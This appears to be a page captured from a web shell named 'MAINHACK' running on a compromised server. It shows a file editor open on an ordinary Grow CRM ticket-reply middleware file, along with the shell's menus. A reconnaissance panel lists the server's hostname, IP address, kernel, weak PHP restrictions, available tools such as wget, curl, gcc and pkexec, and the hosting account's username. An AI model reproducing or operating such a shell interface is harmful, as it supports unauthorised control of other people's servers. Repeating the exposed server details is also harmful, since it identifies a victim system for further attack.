[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Reply.php
<?php /** -------------------------------------------------------------------------------- * This middleware class handles [reply] precheck processes for tickets * * @package Grow CRM * @author NextLoop *----------------------------------------------------------------------------------*/ namespace App\Http\Middleware\Tickets; use Closure; use Log; class Reply { /** * This middleware does the following * 1. add various needed data into the request * * @param \Illuminate\Http\Request $request * @param \Closure $next * @return mixed */ public function handle($request, Closure $next) { //validate module status if (!config('visibility.modules.tickets')) { abort(404, __('lang.the_requested_service_not_found')); return $next($request); } //ticket id $ticket_id = $request->route('ticket'); //does the ticket exist if ($ticket_id == '' || !$ticket = \App\Models\Ticket::Where('ticket_id', $ticket_id)->first()) { Log::error("ticket could not be found", ['process' => '[permissions][tickets][edit]', 'ref' => config('app.debug_ref'), 'function' => __function__, 'file' => basename(__FILE__), 'line' => __line__, 'path' => __file__, 'ticket id' => $ticket_id ?? '']); abort(404); } //add ticket it to request request()->merge([ 'ticketreply_ticketid' => $request->route('ticket'), ]); //update status - use the status that has been set by the admin if (auth()->user()->is_team) { if ($status = \App\Models\TicketStatus::Where('ticketstatus_use_for_team_replied', 'yes')->first()) { request()->merge([ 'ticket_status' => $status->ticketstatus_id, ]); } else { //keep the current status (do not change) request()->merge([ 'ticket_status' => $ticket->ticket_status, ]); } //sanity on the reply type if (!in_array(request('ticketreply_type'), ['reply', 'note'])) { request()->merge([ 'ticketreply_type' => 'reply', ]); } } //update status - use the status that has been set by the admin if (auth()->user()->is_client) { if ($status = \App\Models\TicketStatus::Where('ticketstatus_use_for_client_replied', 'yes')->first()) { request()->merge([ 'ticket_status' => $status->ticketstatus_id, ]); } else { //keep the current status (do not change) request()->merge([ 'ticket_status' => $ticket->ticket_status, ]); } //always make this a reply and not a note request()->merge([ 'ticketreply_type' => 'reply', ]); } return $next($request); } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.84 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002